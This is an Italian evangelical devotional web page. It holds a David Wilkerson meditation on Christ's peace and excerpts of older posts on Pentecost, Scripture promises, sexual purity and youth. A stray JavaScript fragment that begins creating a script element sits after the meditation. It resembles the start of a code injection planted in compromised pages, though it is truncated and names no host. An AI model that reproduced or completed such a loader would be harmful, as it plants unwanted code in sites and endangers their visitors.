Meditazione del giorno: UN CUORE TURBATO

di  DAVID WILKERSON –   Gesù disse: “Il vostro cuore non sia turbato e non si spaventi” (Giovanni 14:27). Ma il fatto è che molti cristiani hanno un cuore turbato e vivono nella paura. Gesù disse anche nello stesso verso: “Vi lascio la pace, vi do la mia pace”. Tuttavia, pochi credenti possono dire di godere di una costante pace nella mente. Per molti, la pace viene e va, lasciandoli preoccupati, travagliati e vittime dello stress. Ecco cosa profetizzò Zaccaria del futuro Messia: “Per concederci che, liberati dalle mani dei nostri nemici, lo potessimo servire senza paura, in santità e giustizia davanti a lui, tutti i giorni della nostra vita” (Luca 1:74-75). 

Amato, Gesù venne su questa terra e morì per l’uomo peccatore affinché questo potesse camminare con Dio senza paura, godendo della Sua pace tutti i giorni della sua vita.
Nessun timore, solo pace nella mente per tutti i nostri giorni! Ciò include giorni buoni e meno buoni, giorni di sofferenza, tumulto, prova e incertezza. Non importa ciò che attraversiamo, dobbiamo godere sempre della pace. Zaccaria aggiunse queste parole su Gesù: “per illuminare quelli che giacevano nelle tenebre e nell’ombra della morte, per guidare i nostri passi nella via della pace” (verso 79). Stava dicendo che Gesù avrebbe guidato ogni Suo figlio nel cammino della pace, non nell’irrequietezza, il vuoto o il timore.Gesù è il Principe della Pace. Alla Sua nascita, gli angeli cantarono, “Pace in terra!” Il Suo vangelo viene definito il vangelo della pace ed Egli promise di Sé stesso, “abbiate pace in Me” (Giovanni 16:33). La pace è tutto ciò di cui tratta l’evangelo. “La parola che egli ha dato ai figli d’Israele, annunziando la pace per mezzo di Gesù Cristo” (Atti 10:36).In questo mondo affronteremo tribolazione, persecuzione e prove tremende – “combattimenti di fuori, paure di dentro”, secondo Paolo (2 Corinzi 7:5). Saremo tentati, soffriremo per la causa di Cristo e i venti dell’avversità cercheranno di abbattere la casa della fede che edifichiamo sulla Rocca della nostra salvezza – Gesù – ma cammineremo in pace a motivo di Lui.

var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

LA POTENZA DELLO SPIRITO SANTO

Il Risveglio della Pentecoste è la risposta di Dio ai bisogni degli ultimi giorni. Noi viviamo in giorni di grande potenza : potenza politica, meccanica, nucleare e potenza demoniaca. La violenza s’accresce ogni giorno nel mondo. La potenza dello Spirito Santo è per noi, essa ci appartiene. Sta a noi che abbiamo ricevuto il battesimo dello Spirito Santo di utilizzare questa potenza di Dio, fino al suo pieno …
Leggi Tutto

Promessa per oggi: La mia Parola non tornerà a me a vuoto.

Come infatti la pioggia e la neve scendono dal cielo e non vi ritornano senza avere annaffiato la terra, senza averla fecondata e fatta germogliare, in modo da dare il seme al seminatore e pane da mangiare, 11 così sarà la mia parola, uscita dalla mia bocca: essa non ritornerà a me a vuoto, senza avere compiuto ciò che desidero e realizzato pienamente ciò per cui l’ho mandata. (Isaia 55:10-11) …
Leggi Tutto

ALLATTA IL BAMBINO E AVRAI IL TUO SALARIO

“Porta via questo bambino… allattalo, e io ti darò il tuo salario” (Esodo 2:9). Jokebed non si rendeva completamente conto del significato della sua fede quando affidava il suo piccolo al Signore, deponendolo dentro una cesta e nascondendolo nel canneto sulla riva del Nilo. Ella non pensava neppure che stava dando un bellissimo esempio a favore di milioni di bambini che, come Mosè, sarebbero stati usati da Dio …
Leggi Tutto

PER TUTTI I TEMPI E PER TUTTI GLI UOMINI

di  ANDRÉ THOMAS BRÈS  –    Quando si legge il libro degli Atti, ci si rende conto che lungi d’aver avuto luogo una volta per tutte, la Pentecoste non ha cessato di riprodursi. Alla fine del IV capitolo, leggiamo di una Pentecoste accordata a coloro che ne avevano già ricevuta una prima. Nell’VIII capitolo, Pentecoste a Samaria! Nell’XI capitolo, Pentecoste a Cesarea, nella casa di Cornelio ! Nel …
Leggi Tutto

Sermone: La Chiesa il Tempio di Dio

​     Sermone di Agostino Masdea  –  1 Corinti 3  – “La Chiesa, il tempio di Dio”. Da cosa sono causati i problemi nella chiesa oggi? Cos’è che porta divisione? Qual è il marchio di una chiesa matura e spirituale? Nella chiesa non ci sarebbero problemi, non ci sarebbero mal di pancia, lamentele e critiche, se ogni credente si arrendesse all’opera dello Spirito Santo! Bisognerebbe avvisare tanti …
Leggi Tutto

NOI DICIAMO:

“E ‘impossibile!” –  DIO TI DICE: “Tutto è possibile!” (Luca 18:27)Sono troppo stanco”  –   DIO TI DICE: “Io ti darò riposo” (Matteo 11:28, 29, 30)”Nessuno mi ama veramente” –  DIO TI DICE: “Io ti amo”. (Gv 3,16; 13,34)”Non posso andare avanti” –  DIO TI DICE : “La mia grazia ti basta” (2 Corinzi 12:9; Sal 91:15)”Non riesco a capire come vanno le cose”  –  DIO TI DICE:  “Io …
Leggi Tutto

Perchè no il sesso prima del matrimonio?

di Mike Campagna – “Fuggite la fornicazione. Qualunque altro peccato che l’uomo commetta è fuori del corpo, ma chi commette fornicazione pecca contro il suo proprio corpo. Non sapete che il vostro corpo è il tempio dello Spirito Santo? “(1 Corinzi 6:18).   –  Sono sempre stato affascinato dalle tigri allo zoo. Mi ricordo in particolare uno zoo nel Minnesota dove le tigri si potevano guardare dall’alto in basso attraverso una vetrata …
Leggi Tutto

NEL CUORE DEI GIOVANI

di BILLY GRAHAM –  Uno dei racconti più belli che ci ha dato la letteratura è quello di Isacco e di Rebecca contenuto nelle Sacre Scritture. Pochi ammettono che la Bibbia sia un libro per i giovani, ricco di episodi idilliaci! Questa storia si svolge in un antico paese, in mezzo a un popolo di costumi particolari, ma Dio, tramite, essa, ha molte cose da insegnarci oggi. Si …
Leggi Tutto

Dai nostri Culti